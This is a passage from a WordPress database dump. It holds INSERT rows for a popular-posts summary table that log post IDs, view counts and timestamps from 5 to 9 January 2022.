11:11:56'),(41550,4238,1,'2022-01-05','2022-01-05 11:22:51'),(41551,3664,1,'2022-01-05','2022-01-05 11:32:11'),(41552,4326,1,'2022-01-05','2022-01-05 11:34:33'),(41553,1544,1,'2022-01-05','2022-01-05 11:37:37'),(41554,3482,1,'2022-01-05','2022-01-05 11:45:34'),(41555,3787,1,'2022-01-05','2022-01-05 11:46:34'),(41556,2748,1,'2022-01-05','2022-01-05 11:49:55'),(41557,4396,1,'2022-01-05','2022-01-05 12:03:45'),(41558,3072,1,'2022-01-05','2022-01-05 12:09:28'),(41559,1606,1,'2022-01-05','2022-01-05 12:14:01'),(41560,2297,1,'2022-01-05','2022-01-05 12:17:13'),(41561,1741,1,'2022-01-05','2022-01-05 12:30:19'),(41562,1600,1,'2022-01-05','2022-01-05 12:44:09'),(41563,3674,1,'2022-01-05','2022-01-05 13:04:14'),(41564,468,1,'2022-01-05','2022-01-05 13:14:20'),(41565,1600,1,'2022-01-05','2022-01-05 13:29:08'),(41566,1606,1,'2022-01-05','2022-01-05 13:33:10'),(41567,2609,1,'2022-01-05','2022-01-05 13:40:17'),(41568,2609,1,'2022-01-05','2022-01-05 13:40:21'),(41569,1695,1,'2022-01-05','2022-01-05 13:52:49');
INSERT INTO `wp_popularpostssummary` VALUES (41570,3087,1,'2022-01-05','2022-01-05 14:01:24'),(41571,3107,1,'2022-01-05','2022-01-05 15:45:10'),(41572,2503,1,'2022-01-05','2022-01-05 15:53:15'),(41573,4436,1,'2022-01-05','2022-01-05 15:53:50'),(41574,1594,1,'2022-01-05','2022-01-05 16:01:33'),(41575,3781,1,'2022-01-05','2022-01-05 16:18:45'),(41576,1718,1,'2022-01-05','2022-01-05 16:21:06'),(41577,1612,1,'2022-01-05','2022-01-05 16:36:31'),(41578,3482,1,'2022-01-05','2022-01-05 16:40:55'),(41579,4238,1,'2022-01-05','2022-01-05 16:41:02'),(41580,3087,1,'2022-01-05','2022-01-05 16:41:05'),(41581,467,1,'2022-01-05','2022-01-05 16:41:07'),(41582,1720,1,'2022-01-05','2022-01-05 16:41:08'),(41583,1606,1,'2022-01-05','2022-01-05 16:41:13'),(41584,1608,1,'2022-01-05','2022-01-05 17:25:59'),(41585,1870,1,'2022-01-05','2022-01-05 17:26:02'),(41586,2748,1,'2022-01-05','2022-01-05 17:26:07'),(41587,3787,1,'2022-01-05','2022-01-05 17:26:08'),(41588,1544,1,'2022-01-05','2022-01-05 17:26:23'),(41589,3482,1,'2022-01-05','2022-01-05 18:12:51'),(41590,3083,1,'2022-01-05','2022-01-05 18:32:04'),(41591,3083,1,'2022-01-05','2022-01-05 18:32:44'),(41592,1695,1,'2022-01-05','2022-01-05 18:55:58'),(41593,2297,1,'2022-01-05','2022-01-05 18:57:15'),(41594,484,1,'2022-01-05','2022-01-05 19:35:51'),(41595,3247,1,'2022-01-05','2022-01-05 20:11:37'),(41596,2297,1,'2022-01-05','2022-01-05 20:27:38'),(41597,1612,1,'2022-01-05','2022-01-05 20:36:09'),(41598,1602,1,'2022-01-05','2022-01-05 22:00:09'),(41599,2159,1,'2022-01-05','2022-01-05 22:47:33'),(41600,2964,1,'2022-01-05','2022-01-05 22:49:15'),(41601,484,1,'2022-01-05','2022-01-05 23:37:04'),(41602,467,1,'2022-01-06','2022-01-06 02:06:16'),(41603,3787,1,'2022-01-06','2022-01-06 03:35:58'),(41604,1870,1,'2022-01-06','2022-01-06 03:36:13'),(41605,87,1,'2022-01-06','2022-01-06 03:36:56'),(41606,2704,1,'2022-01-06','2022-01-06 04:48:03'),(41607,1720,1,'2022-01-06','2022-01-06 05:06:20'),(41608,3482,1,'2022-01-06','2022-01-06 05:17:18'),(41609,1586,1,'2022-01-06','2022-01-06 07:05:22'),(41610,76,1,'2022-01-06','2022-01-06 07:27:49'),(41611,84,1,'2022-01-06','2022-01-06 07:28:58'),(41612,68,1,'2022-01-06','2022-01-06 07:29:10'),(41613,72,1,'2022-01-06','2022-01-06 07:30:01'),(41614,76,1,'2022-01-06','2022-01-06 07:30:10'),(41615,87,1,'2022-01-06','2022-01-06 07:37:02'),(41616,487,1,'2022-01-06','2022-01-06 07:37:35'),(41617,76,1,'2022-01-06','2022-01-06 07:38:50'),(41618,68,1,'2022-01-06','2022-01-06 07:43:04'),(41619,76,1,'2022-01-06','2022-01-06 07:43:18'),(41620,91,1,'2022-01-06','2022-01-06 07:50:30'),(41621,76,1,'2022-01-06','2022-01-06 07:50:46'),(41622,108,1,'2022-01-06','2022-01-06 07:50:58'),(41623,76,1,'2022-01-06','2022-01-06 07:51:28'),(41624,3097,1,'2022-01-06','2022-01-06 07:57:40'),(41625,2297,1,'2022-01-06','2022-01-06 07:59:39'),(41626,1608,1,'2022-01-06','2022-01-06 08:03:39'),(41627,76,1,'2022-01-06','2022-01-06 08:06:22'),(41628,76,1,'2022-01-06','2022-01-06 08:07:00'),(41629,2503,1,'2022-01-06','2022-01-06 08:07:46'),(41630,1602,1,'2022-01-06','2022-01-06 08:15:27'),(41631,76,1,'2022-01-06','2022-01-06 08:19:21'),(41632,76,1,'2022-01-06','2022-01-06 08:19:29'),(41633,1606,1,'2022-01-06','2022-01-06 08:29:53'),(41634,468,1,'2022-01-06','2022-01-06 08:37:19'),(41635,3247,1,'2022-01-06','2022-01-06 08:57:32'),(41636,1544,1,'2022-01-06','2022-01-06 08:59:39'),(41637,470,1,'2022-01-06','2022-01-06 09:07:58'),(41638,470,1,'2022-01-06','2022-01-06 09:10:42'),(41639,108,1,'2022-01-06','2022-01-06 09:33:39'),(41640,3247,1,'2022-01-06','2022-01-06 09:37:46'),(41641,1877,1,'2022-01-06','2022-01-06 10:15:59'),(41642,3072,1,'2022-01-06','2022-01-06 10:21:02'),(41643,1612,1,'2022-01-06','2022-01-06 10:27:54'),(41644,4517,1,'2022-01-06','2022-01-06 10:51:32'),(41645,3710,1,'2022-01-06','2022-01-06 10:58:56'),(41646,467,1,'2022-01-06','2022-01-06 11:00:48'),(41647,4520,1,'2022-01-06','2022-01-06 11:09:46'),(41648,2503,1,'2022-01-06','2022-01-06 11:12:14'),(41649,72,1,'2022-01-06','2022-01-06 11:36:42'),(41650,4238,1,'2022-01-06','2022-01-06 11:54:53'),(41651,3706,1,'2022-01-06','2022-01-06 13:24:22'),(41652,4391,1,'2022-01-06','2022-01-06 13:47:46'),(41653,1582,1,'2022-01-06','2022-01-06 13:58:59'),(41654,91,1,'2022-01-06','2022-01-06 13:59:08'),(41655,4542,1,'2022-01-06','2022-01-06 13:59:26'),(41656,76,1,'2022-01-06','2022-01-06 14:02:13'),(41657,91,1,'2022-01-06','2022-01-06 14:04:17'),(41658,4542,1,'2022-01-06','2022-01-06 14:05:22'),(41659,4542,1,'2022-01-06','2022-01-06 14:05:28'),(41660,91,1,'2022-01-06','2022-01-06 14:14:10'),(41661,4448,1,'2022-01-06','2022-01-06 14:14:31'),(41662,4448,1,'2022-01-06','2022-01-06 14:14:31'),(41663,3004,1,'2022-01-06','2022-01-06 14:28:13'),(41664,3004,1,'2022-01-06','2022-01-06 14:31:27'),(41665,2309,1,'2022-01-06','2022-01-06 14:36:49'),(41666,2309,1,'2022-01-06','2022-01-06 14:36:51'),(41667,3004,1,'2022-01-06','2022-01-06 14:49:35'),(41668,3482,1,'2022-01-06','2022-01-06 14:53:52'),(41669,91,1,'2022-01-06','2022-01-06 14:54:42'),(41670,4432,1,'2022-01-06','2022-01-06 14:55:41'),(41671,4432,1,'2022-01-06','2022-01-06 14:55:45'),(41672,80,1,'2022-01-06','2022-01-06 14:56:26'),(41673,91,1,'2022-01-06','2022-01-06 14:56:30'),(41674,3004,1,'2022-01-06','2022-01-06 15:00:33'),(41675,3764,1,'2022-01-06','2022-01-06 15:30:26'),(41676,2748,1,'2022-01-06','2022-01-06 15:41:01'),(41677,472,1,'2022-01-06','2022-01-06 16:15:14'),(41678,4457,1,'2022-01-06','2022-01-06 17:23:40'),(41679,1718,1,'2022-01-06','2022-01-06 18:30:17'),(41680,1606,1,'2022-01-06','2022-01-06 19:06:24'),(41681,1608,1,'2022-01-06','2022-01-06 19:06:27'),(41682,2297,1,'2022-01-06','2022-01-06 19:06:45'),(41683,1606,1,'2022-01-06','2022-01-06 19:07:11'),(41684,108,1,'2022-01-06','2022-01-06 19:23:36'),(41685,468,1,'2022-01-06','2022-01-06 19:27:42'),(41686,1544,1,'2022-01-06','2022-01-06 19:36:17'),(41687,72,1,'2022-01-06','2022-01-06 19:41:00'),(41688,1877,1,'2022-01-06','2022-01-06 19:47:51'),(41689,3072,1,'2022-01-06','2022-01-06 19:55:49'),(41690,1600,1,'2022-01-06','2022-01-06 20:12:13'),(41691,2813,1,'2022-01-06','2022-01-06 20:19:26'),(41692,2813,1,'2022-01-06','2022-01-06 20:20:04'),(41693,4326,1,'2022-01-06','2022-01-06 20:23:02'),(41694,87,1,'2022-01-06','2022-01-06 20:35:52'),(41695,1732,1,'2022-01-06','2022-01-06 20:36:00'),(41696,1695,1,'2022-01-06','2022-01-06 20:36:59'),(41697,2297,1,'2022-01-06','2022-01-06 20:39:18'),(41698,476,1,'2022-01-06','2022-01-06 20:51:41'),(41699,2457,1,'2022-01-06','2022-01-06 21:02:25'),(41700,3482,1,'2022-01-06','2022-01-06 21:03:42'),(41701,4457,1,'2022-01-06','2022-01-06 21:10:32'),(41702,1586,1,'2022-01-06','2022-01-06 22:07:43'),(41703,3245,1,'2022-01-06','2022-01-06 22:18:28'),(41704,2309,1,'2022-01-06','2022-01-06 22:25:36'),(41705,3706,1,'2022-01-06','2022-01-06 22:50:55'),(41706,1586,1,'2022-01-06','2022-01-06 23:04:15'),(41707,4498,1,'2022-01-06','2022-01-06 23:04:18'),(41708,1586,1,'2022-01-06','2022-01-06 23:08:55'),(41709,3271,1,'2022-01-06','2022-01-06 23:19:55'),(41710,467,1,'2022-01-06','2022-01-06 23:36:32'),(41711,1612,1,'2022-01-06','2022-01-06 23:40:55'),(41712,1612,1,'2022-01-06','2022-01-06 23:41:20'),(41713,76,1,'2022-01-06','2022-01-06 23:41:32'),(41714,4524,1,'2022-01-07','2022-01-07 00:15:01'),(41715,476,1,'2022-01-07','2022-01-07 00:44:14'),(41716,2165,1,'2022-01-07','2022-01-07 01:58:15'),(41717,468,1,'2022-01-07','2022-01-07 04:48:49'),(41718,4238,1,'2022-01-07','2022-01-07 05:41:10'),(41719,1606,1,'2022-01-07','2022-01-07 05:41:29'),(41720,2503,1,'2022-01-07','2022-01-07 05:41:38'),(41721,1606,1,'2022-01-07','2022-01-07 05:42:32'),(41722,472,1,'2022-01-07','2022-01-07 06:05:36'),(41723,2309,1,'2022-01-07','2022-01-07 06:27:58'),(41724,91,1,'2022-01-07','2022-01-07 06:39:31'),(41725,4440,1,'2022-01-07','2022-01-07 06:40:08'),(41726,4440,1,'2022-01-07','2022-01-07 06:40:11'),(41727,91,1,'2022-01-07','2022-01-07 06:43:18'),(41728,4424,1,'2022-01-07','2022-01-07 06:43:34'),(41729,4424,1,'2022-01-07','2022-01-07 06:43:37'),(41730,91,1,'2022-01-07','2022-01-07 06:46:42'),(41731,1703,1,'2022-01-07','2022-01-07 06:47:23'),(41732,1703,1,'2022-01-07','2022-01-07 06:47:30'),(41733,1703,1,'2022-01-07','2022-01-07 06:47:41'),(41734,1703,1,'2022-01-07','2022-01-07 06:47:51'),(41735,1703,1,'2022-01-07','2022-01-07 06:47:58'),(41736,91,1,'2022-01-07','2022-01-07 06:48:20'),(41737,2609,1,'2022-01-07','2022-01-07 06:50:11'),(41738,2609,1,'2022-01-07','2022-01-07 06:50:17'),(41739,477,1,'2022-01-07','2022-01-07 06:50:25'),(41740,2609,1,'2022-01-07','2022-01-07 06:50:28'),(41741,2297,1,'2022-01-07','2022-01-07 07:11:05'),(41742,3787,1,'2022-01-07','2022-01-07 07:11:09'),(41743,108,1,'2022-01-07','2022-01-07 07:11:13'),(41744,1695,1,'2022-01-07','2022-01-07 07:13:03'),(41745,1598,1,'2022-01-07','2022-01-07 08:22:38'),(41746,1612,1,'2022-01-07','2022-01-07 08:30:03'),(41747,74,1,'2022-01-07','2022-01-07 08:31:58'),(41748,1612,1,'2022-01-07','2022-01-07 08:32:24'),(41749,1544,1,'2022-01-07','2022-01-07 08:41:18'),(41750,1602,1,'2022-01-07','2022-01-07 09:27:59'),(41751,469,1,'2022-01-07','2022-01-07 09:50:39'),(41752,3041,1,'2022-01-07','2022-01-07 09:54:40'),(41753,3531,1,'2022-01-07','2022-01-07 09:58:35'),(41754,3482,1,'2022-01-07','2022-01-07 10:18:30'),(41755,1582,1,'2022-01-07','2022-01-07 10:35:25'),(41756,3752,1,'2022-01-07','2022-01-07 10:41:02'),(41757,487,1,'2022-01-07','2022-01-07 10:41:21'),(41758,1778,1,'2022-01-07','2022-01-07 11:25:39'),(41759,2748,1,'2022-01-07','2022-01-07 11:28:21'),(41760,2159,1,'2022-01-07','2022-01-07 11:45:26'),(41761,72,1,'2022-01-07','2022-01-07 11:45:51'),(41762,2704,1,'2022-01-07','2022-01-07 11:45:59'),(41763,3045,1,'2022-01-07','2022-01-07 11:46:05'),(41764,3045,1,'2022-01-07','2022-01-07 11:46:17'),(41765,1586,1,'2022-01-07','2022-01-07 11:48:30'),(41766,1588,1,'2022-01-07','2022-01-07 11:48:37'),(41767,2457,1,'2022-01-07','2022-01-07 11:54:27'),(41768,4457,1,'2022-01-07','2022-01-07 11:59:27'),(41769,1718,1,'2022-01-07','2022-01-07 12:06:41'),(41770,1592,1,'2022-01-07','2022-01-07 12:15:58'),(41771,68,1,'2022-01-07','2022-01-07 12:16:39'),(41772,1600,1,'2022-01-07','2022-01-07 12:29:58'),(41773,3097,1,'2022-01-07','2022-01-07 12:36:39'),(41774,1614,1,'2022-01-07','2022-01-07 12:46:18'),(41775,1594,1,'2022-01-07','2022-01-07 12:53:58'),(41776,2813,1,'2022-01-07','2022-01-07 12:56:03'),(41777,3781,1,'2022-01-07','2022-01-07 13:01:40'),(41778,80,1,'2022-01-07','2022-01-07 13:07:19'),(41779,3764,1,'2022-01-07','2022-01-07 13:13:36'),(41780,3051,1,'2022-01-07','2022-01-07 13:17:10'),(41781,3664,1,'2022-01-07','2022-01-07 13:18:18'),(41782,1606,1,'2022-01-07','2022-01-07 13:31:56'),(41783,2154,1,'2022-01-07','2022-01-07 13:35:05'),(41784,1612,1,'2022-01-07','2022-01-07 13:37:27'),(41785,1594,1,'2022-01-07','2022-01-07 13:45:08'),(41786,1872,1,'2022-01-07','2022-01-07 13:46:06'),(41787,1877,1,'2022-01-07','2022-01-07 13:52:26'),(41788,2410,1,'2022-01-07','2022-01-07 13:59:50'),(41789,2804,1,'2022-01-07','2022-01-07 14:07:40'),(41790,2971,1,'2022-01-07','2022-01-07 14:12:15'),(41791,2989,1,'2022-01-07','2022-01-07 14:15:41'),(41792,108,1,'2022-01-07','2022-01-07 14:17:40'),(41793,2297,1,'2022-01-07','2022-01-07 14:17:53'),(41794,2309,1,'2022-01-07','2022-01-07 14:22:26'),(41795,2309,1,'2022-01-07','2022-01-07 14:23:15'),(41796,4529,1,'2022-01-07','2022-01-07 14:29:53'),(41797,3045,1,'2022-01-07','2022-01-07 14:45:02'),(41798,3746,1,'2022-01-07','2022-01-07 14:46:32'),(41799,2297,1,'2022-01-07','2022-01-07 15:02:13'),(41800,1594,1,'2022-01-07','2022-01-07 15:26:50'),(41801,1594,1,'2022-01-07','2022-01-07 15:32:33'),(41802,84,1,'2022-01-07','2022-01-07 15:44:49'),(41803,74,1,'2022-01-07','2022-01-07 15:45:22'),(41804,80,1,'2022-01-07','2022-01-07 15:45:43'),(41805,80,1,'2022-01-07','2022-01-07 15:46:25'),(41806,91,1,'2022-01-07','2022-01-07 15:46:56'),(41807,108,1,'2022-01-07','2022-01-07 15:49:02'),(41808,1608,1,'2022-01-07','2022-01-07 15:49:18'),(41809,472,1,'2022-01-07','2022-01-07 15:50:02'),(41810,1594,1,'2022-01-07','2022-01-07 15:51:03'),(41811,1602,1,'2022-01-07','2022-01-07 16:20:59'),(41812,87,1,'2022-01-07','2022-01-07 16:28:27'),(41813,1598,1,'2022-01-07','2022-01-07 16:30:23'),(41814,1544,1,'2022-01-07','2022-01-07 16:34:00'),(41815,1877,1,'2022-01-07','2022-01-07 16:45:12'),(41816,3691,1,'2022-01-07','2022-01-07 17:19:03'),(41817,3752,1,'2022-01-07','2022-01-07 17:21:13'),(41818,1602,1,'2022-01-07','2022-01-07 17:38:28'),(41819,3072,1,'2022-01-07','2022-01-07 17:41:12'),(41820,3278,1,'2022-01-07','2022-01-07 17:43:22'),(41821,3278,1,'2022-01-07','2022-01-07 17:43:46'),(41822,3278,1,'2022-01-07','2022-01-07 17:43:58'),(41823,3278,1,'2022-01-07','2022-01-07 17:44:06'),(41824,469,1,'2022-01-07','2022-01-07 17:54:05'),(41825,1695,1,'2022-01-07','2022-01-07 18:05:56'),(41826,1582,1,'2022-01-07','2022-01-07 18:39:53'),(41827,1709,1,'2022-01-07','2022-01-07 19:10:59'),(41828,570,1,'2022-01-07','2022-01-07 19:14:47'),(41829,1586,1,'2022-01-07','2022-01-07 19:23:58'),(41830,1608,1,'2022-01-07','2022-01-07 19:34:08'),(41831,2159,1,'2022-01-07','2022-01-07 19:52:53'),(41832,1588,1,'2022-01-07','2022-01-07 20:00:27'),(41833,2159,1,'2022-01-07','2022-01-07 20:06:01'),(41834,2159,1,'2022-01-07','2022-01-07 20:06:29'),(41835,2457,1,'2022-01-07','2022-01-07 20:18:27'),(41836,3282,1,'2022-01-07','2022-01-07 20:19:00'),(41837,1718,1,'2022-01-07','2022-01-07 20:36:16'),(41838,4326,1,'2022-01-07','2022-01-07 20:42:31'),(41839,1594,1,'2022-01-07','2022-01-07 20:54:18'),(41840,80,1,'2022-01-07','2022-01-07 21:13:45'),(41841,1594,1,'2022-01-07','2022-01-07 21:42:20'),(41842,3781,1,'2022-01-07','2022-01-07 21:55:45'),(41843,1612,1,'2022-01-07','2022-01-07 22:05:48'),(41844,1606,1,'2022-01-07','2022-01-07 22:11:00'),(41845,1592,1,'2022-01-07','2022-01-07 22:46:06'),(41846,1614,1,'2022-01-07','2022-01-07 22:59:47'),(41847,3124,1,'2022-01-07','2022-01-07 23:07:41'),(41848,2154,1,'2022-01-07','2022-01-07 23:08:59'),(41849,3482,1,'2022-01-07','2022-01-07 23:09:30'),(41850,2904,1,'2022-01-07','2022-01-07 23:14:01'),(41851,2813,1,'2022-01-07','2022-01-07 23:14:50'),(41852,3781,1,'2022-01-07','2022-01-07 23:19:46'),(41853,2161,1,'2022-01-07','2022-01-07 23:25:02'),(41854,4323,1,'2022-01-07','2022-01-07 23:28:12'),(41855,3229,1,'2022-01-07','2022-01-07 23:39:55'),(41856,3791,1,'2022-01-07','2022-01-07 23:42:50'),(41857,472,1,'2022-01-07','2022-01-07 23:49:53'),(41858,2558,1,'2022-01-07','2022-01-07 23:51:20'),(41859,2159,1,'2022-01-07','2022-01-07 23:53:55'),(41860,72,1,'2022-01-07','2022-01-07 23:53:57'),(41861,1776,1,'2022-01-07','2022-01-07 23:54:57'),(41862,3764,1,'2022-01-07','2022-01-07 23:59:47'),(41863,68,1,'2022-01-08','2022-01-08 00:10:50'),(41864,1877,1,'2022-01-08','2022-01-08 00:18:14'),(41865,1598,1,'2022-01-08','2022-01-08 00:20:18'),(41866,2297,1,'2022-01-08','2022-01-08 00:25:44'),(41867,3045,1,'2022-01-08','2022-01-08 00:38:53'),(41868,3482,1,'2022-01-08','2022-01-08 00:40:22'),(41869,3482,1,'2022-01-08','2022-01-08 00:41:16'),(41870,3124,1,'2022-01-08','2022-01-08 00:45:32'),(41871,3691,1,'2022-01-08','2022-01-08 00:49:46'),(41872,3280,1,'2022-01-08','2022-01-08 00:55:23'),(41873,3781,1,'2022-01-08','2022-01-08 00:58:53'),(41874,108,1,'2022-01-08','2022-01-08 01:11:29'),(41875,1776,1,'2022-01-08','2022-01-08 01:23:50'),(41876,3664,1,'2022-01-08','2022-01-08 01:23:52'),(41877,72,1,'2022-01-08','2022-01-08 01:25:13'),(41878,1602,1,'2022-01-08','2022-01-08 01:27:17'),(41879,469,1,'2022-01-08','2022-01-08 01:53:24'),(41880,2159,1,'2022-01-08','2022-01-08 02:09:53'),(41881,1582,1,'2022-01-08','2022-01-08 02:24:16'),(41882,468,1,'2022-01-08','2022-01-08 02:34:50'),(41883,2152,1,'2022-01-08','2022-01-08 02:47:41'),(41884,2297,1,'2022-01-08','2022-01-08 02:57:46'),(41885,570,1,'2022-01-08','2022-01-08 02:58:15'),(41886,1586,1,'2022-01-08','2022-01-08 03:20:15'),(41887,108,1,'2022-01-08','2022-01-08 04:11:45'),(41888,1594,1,'2022-01-08','2022-01-08 04:46:00'),(41889,1594,1,'2022-01-08','2022-01-08 04:50:05'),(41890,2457,1,'2022-01-08','2022-01-08 05:12:46'),(41891,1608,1,'2022-01-08','2022-01-08 06:04:49'),(41892,1612,1,'2022-01-08','2022-01-08 06:07:27'),(41893,1718,1,'2022-01-08','2022-01-08 06:10:48'),(41894,474,1,'2022-01-08','2022-01-08 06:15:22'),(41895,2309,1,'2022-01-08','2022-01-08 06:20:34'),(41896,80,1,'2022-01-08','2022-01-08 06:29:01'),(41897,1582,1,'2022-01-08','2022-01-08 06:37:31'),(41898,1592,1,'2022-01-08','2022-01-08 06:39:25'),(41899,1614,1,'2022-01-08','2022-01-08 06:55:48'),(41900,2813,1,'2022-01-08','2022-01-08 07:01:02'),(41901,1606,1,'2022-01-08','2022-01-08 07:03:27'),(41902,3781,1,'2022-01-08','2022-01-08 07:20:30'),(41903,3704,1,'2022-01-08','2022-01-08 07:42:14'),(41904,472,1,'2022-01-08','2022-01-08 07:53:07'),(41905,3271,1,'2022-01-08','2022-01-08 08:02:41'),(41906,1598,1,'2022-01-08','2022-01-08 08:20:34'),(41907,3764,1,'2022-01-08','2022-01-08 08:42:27'),(41908,3691,1,'2022-01-08','2022-01-08 08:50:56'),(41909,3072,1,'2022-01-08','2022-01-08 09:01:55'),(41910,1602,1,'2022-01-08','2022-01-08 09:30:10'),(41911,2154,1,'2022-01-08','2022-01-08 09:38:14'),(41912,2159,1,'2022-01-08','2022-01-08 09:55:47'),(41913,72,1,'2022-01-08','2022-01-08 09:56:30'),(41914,1600,1,'2022-01-08','2022-01-08 09:58:32'),(41915,3781,1,'2022-01-08','2022-01-08 09:58:46'),(41916,1582,1,'2022-01-08','2022-01-08 10:10:55'),(41917,2297,1,'2022-01-08','2022-01-08 10:12:03'),(41918,1582,1,'2022-01-08','2022-01-08 10:21:19'),(41919,72,1,'2022-01-08','2022-01-08 10:40:20'),(41920,2159,1,'2022-01-08','2022-01-08 10:40:28'),(41921,68,1,'2022-01-08','2022-01-08 10:40:43'),(41922,469,1,'2022-01-08','2022-01-08 10:49:36'),(41923,570,1,'2022-01-08','2022-01-08 10:53:06'),(41924,1604,1,'2022-01-08','2022-01-08 11:06:27'),(41925,3072,1,'2022-01-08','2022-01-08 11:18:08'),(41926,3087,1,'2022-01-08','2022-01-08 11:19:08'),(41927,1586,1,'2022-01-08','2022-01-08 11:25:17'),(41928,3045,1,'2022-01-08','2022-01-08 11:26:26'),(41929,1776,1,'2022-01-08','2022-01-08 12:03:08'),(41930,1872,1,'2022-01-08','2022-01-08 12:10:54'),(41931,3229,1,'2022-01-08','2022-01-08 12:11:02'),(41932,108,1,'2022-01-08','2022-01-08 12:11:20'),(41933,1588,1,'2022-01-08','2022-01-08 12:26:25'),(41934,468,1,'2022-01-08','2022-01-08 12:41:30'),(41935,4301,1,'2022-01-08','2022-01-08 12:47:23'),(41936,3664,1,'2022-01-08','2022-01-08 12:56:54'),(41937,1594,1,'2022-01-08','2022-01-08 12:57:07'),(41938,3482,1,'2022-01-08','2022-01-08 12:59:24'),(41939,3664,1,'2022-01-08','2022-01-08 13:00:03'),(41940,467,1,'2022-01-08','2022-01-08 13:01:23'),(41941,467,1,'2022-01-08','2022-01-08 13:01:41'),(41942,1544,1,'2022-01-08','2022-01-08 13:11:15'),(41943,3781,1,'2022-01-08','2022-01-08 13:25:30'),(41944,2457,1,'2022-01-08','2022-01-08 13:40:36'),(41945,487,1,'2022-01-08','2022-01-08 13:43:22'),(41946,467,1,'2022-01-08','2022-01-08 13:43:23'),(41947,3791,1,'2022-01-08','2022-01-08 14:25:17'),(41948,1768,1,'2022-01-08','2022-01-08 14:28:25'),(41949,1709,1,'2022-01-08','2022-01-08 14:41:16'),(41950,3482,1,'2022-01-08','2022-01-08 15:13:36'),(41951,2309,1,'2022-01-08','2022-01-08 15:19:14'),(41952,1600,1,'2022-01-08','2022-01-08 15:42:05'),(41953,4529,1,'2022-01-08','2022-01-08 15:55:35'),(41954,472,1,'2022-01-08','2022-01-08 16:12:38'),(41955,1598,1,'2022-01-08','2022-01-08 16:33:40'),(41956,2293,1,'2022-01-08','2022-01-08 16:43:43'),(41957,1606,1,'2022-01-08','2022-01-08 16:51:36'),(41958,3691,1,'2022-01-08','2022-01-08 16:55:02'),(41959,1718,1,'2022-01-08','2022-01-08 16:57:50'),(41960,1612,1,'2022-01-08','2022-01-08 16:58:39'),(41961,3781,1,'2022-01-08','2022-01-08 17:03:09'),(41962,1614,1,'2022-01-08','2022-01-08 17:17:47'),(41963,1602,1,'2022-01-08','2022-01-08 17:25:05'),(41964,80,1,'2022-01-08','2022-01-08 17:46:51'),(41965,1592,1,'2022-01-08','2022-01-08 17:48:52'),(41966,469,1,'2022-01-08','2022-01-08 17:55:21'),(41967,4373,1,'2022-01-08','2022-01-08 18:03:04'),(41968,2813,1,'2022-01-08','2022-01-08 18:10:22'),(41969,1582,1,'2022-01-08','2022-01-08 18:24:41'),(41970,3534,1,'2022-01-08','2022-01-08 18:32:48'),(41971,3534,1,'2022-01-08','2022-01-08 18:33:07'),(41972,68,1,'2022-01-08','2022-01-08 18:38:57'),(41973,1598,1,'2022-01-08','2022-01-08 18:44:02'),(41974,1598,1,'2022-01-08','2022-01-08 18:44:06'),(41975,1608,1,'2022-01-08','2022-01-08 18:47:44'),(41976,3764,1,'2022-01-08','2022-01-08 18:50:31'),(41977,570,1,'2022-01-08','2022-01-08 18:50:41'),(41978,80,1,'2022-01-08','2022-01-08 19:03:44'),(41979,3045,1,'2022-01-08','2022-01-08 19:11:58'),(41980,1586,1,'2022-01-08','2022-01-08 19:18:44'),(41981,1877,1,'2022-01-08','2022-01-08 19:31:00'),(41982,3534,1,'2022-01-08','2022-01-08 19:37:45'),(41983,2410,1,'2022-01-08','2022-01-08 19:43:03'),(41984,2159,1,'2022-01-08','2022-01-08 19:51:08'),(41985,72,1,'2022-01-08','2022-01-08 19:51:14'),(41986,1776,1,'2022-01-08','2022-01-08 19:51:15'),(41987,2297,1,'2022-01-08','2022-01-08 19:51:36'),(41988,72,1,'2022-01-08','2022-01-08 19:51:50'),(41989,1588,1,'2022-01-08','2022-01-08 20:27:58'),(41990,1600,1,'2022-01-08','2022-01-08 20:28:58'),(41991,1614,1,'2022-01-08','2022-01-08 20:29:08'),(41992,72,1,'2022-01-08','2022-01-08 20:36:06'),(41993,2297,1,'2022-01-08','2022-01-08 20:36:12'),(41994,486,1,'2022-01-08','2022-01-08 20:38:10'),(41995,4529,1,'2022-01-08','2022-01-08 20:56:01'),(41996,2769,1,'2022-01-08','2022-01-08 21:01:59'),(41997,108,1,'2022-01-08','2022-01-08 21:08:11'),(41998,1776,1,'2022-01-08','2022-01-08 21:21:06'),(41999,2457,1,'2022-01-08','2022-01-08 21:38:00'),(42000,1872,1,'2022-01-08','2022-01-08 21:40:11'),(42001,4301,1,'2022-01-08','2022-01-08 22:06:24'),(42002,1602,1,'2022-01-08','2022-01-08 22:20:29'),(42003,1602,1,'2022-01-08','2022-01-08 22:20:44'),(42004,3710,1,'2022-01-08','2022-01-08 22:23:48'),(42005,1544,1,'2022-01-08','2022-01-08 22:34:01'),(42006,87,1,'2022-01-08','2022-01-08 22:38:16'),(42007,4238,1,'2022-01-08','2022-01-08 22:55:03'),(42008,469,1,'2022-01-08','2022-01-08 23:16:38'),(42009,1870,1,'2022-01-08','2022-01-08 23:38:42'),(42010,3006,1,'2022-01-09','2022-01-09 00:08:03'),(42011,4448,1,'2022-01-09','2022-01-09 00:23:37'),(42012,1768,1,'2022-01-09','2022-01-09 00:53:54'),(42013,4391,1,'2022-01-09','2022-01-09 01:53:36'),(42014,469,1,'2022-01-09','2022-01-09 02:13:00'),(42015,1718,1,'2022-01-09','2022-01-09 02:53:38'),(42016,1870,1,'2022-01-09','2022-01-09 03:23:36'),(42017,3280,1,'2022-01-09','2022-01-09 03:34:23'),(42018,1594,1,'2022-01-09','2022-01-09 03:40:14'),(42019,89,1,'2022-01-09','2022-01-09 04:27:53'),(42020,1582,1,'2022-01-09','2022-01-09 04:28:01'),(42021,1592,1,'2022-01-09','2022-01-09 04:34:09'),(42022,1600,1,'2022-01-09','2022-01-09 04:44:12'),(42023,3764,1,'2022-01-09','2022-01-09 04:49:06'),(42024,108,1,'2022-01-09','2022-01-09 05:11:40'),(42025,3109,1,'2022-01-09','2022-01-09 05:19:13'),(42026,3109,1,'2022-01-09','2022-01-09 05:19:15'),(42027,1594,1,'2022-01-09','2022-01-09 05:49:26'),(42028,1606,1,'2022-01-09','2022-01-09 05:57:08'),(42029,1776,1,'2022-01-09','2022-01-09 06:02:56'),(42030,2297,1,'2022-01-09','2022-01-09 06:03:06'),(42031,2410,1,'2022-01-09','2022-01-09 06:07:13'),(42032,91,1,'2022-01-09','2022-01-09 06:34:15'),(42033,4326,1,'2022-01-09','2022-01-09 06:41:49'),(42034,1614,1,'2022-01-09','2022-01-09 06:43:16'),(42035,4301,1,'2022-01-09','2022-01-09 